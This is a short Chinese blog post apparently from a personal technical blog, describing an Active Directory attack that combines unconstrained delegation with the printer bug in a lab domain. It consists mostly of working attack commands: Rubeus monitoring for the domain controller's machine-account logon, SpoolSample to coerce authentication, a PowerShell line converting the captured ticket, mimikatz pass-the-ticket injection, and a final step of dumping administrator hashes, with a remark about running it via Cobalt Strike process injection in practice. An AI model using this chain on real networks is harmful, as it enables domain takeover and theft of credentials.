非约束委派+打印机

环境

域控:192.168.110.12 主机名:SYNC-DC
域内主机:192.168.1.101 主机名:mrhonest-pc

条件:

+ 获取到设置了非约束委派的主机system权限

利用方法

  • 每秒监听来自域控主机(sync-dc$)的登录请求 现在是system权限
    Rubeus.exe monitor /interval:1 /filteruser:SYNC-DC$

  • 强制域控打印机回连,需在域用户进程上执行(我这里切换一下帐号),或者有域用户的帐号密码

实际中可以这样,cs上注入一个普通进程上执行,或者使用runas等工具执行
SpoolSample.exe SYNC-DC mrhonest-pc

  • 收到票据

  • 转换票据
    [IO.File]::WriteAllBytes("绝对路径\TGS\ticket.kirbi", [Convert]::FromBase64String("得到的base64"))

  • 先清空自身票据 然后导入生成的票据

  • 注入票据
    kerberos::ptt ticket.kirbi

  • dump admin的hash`

posted @   mrhonest  阅读(484)  评论(0编辑  收藏  举报
编辑推荐:
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
阅读排行:
· 10年+ .NET Coder 心语 ── 封装的思维:从隐藏、稳定开始理解其本质意义
· 地球OL攻略 —— 某应届生求职总结
· 提示词工程——AI应用必不可少的技术
· Open-Sora 2.0 重磅开源!
· 周边上新:园子的第一款马克杯温暖上架
点击右上角即可分享
微信分享提示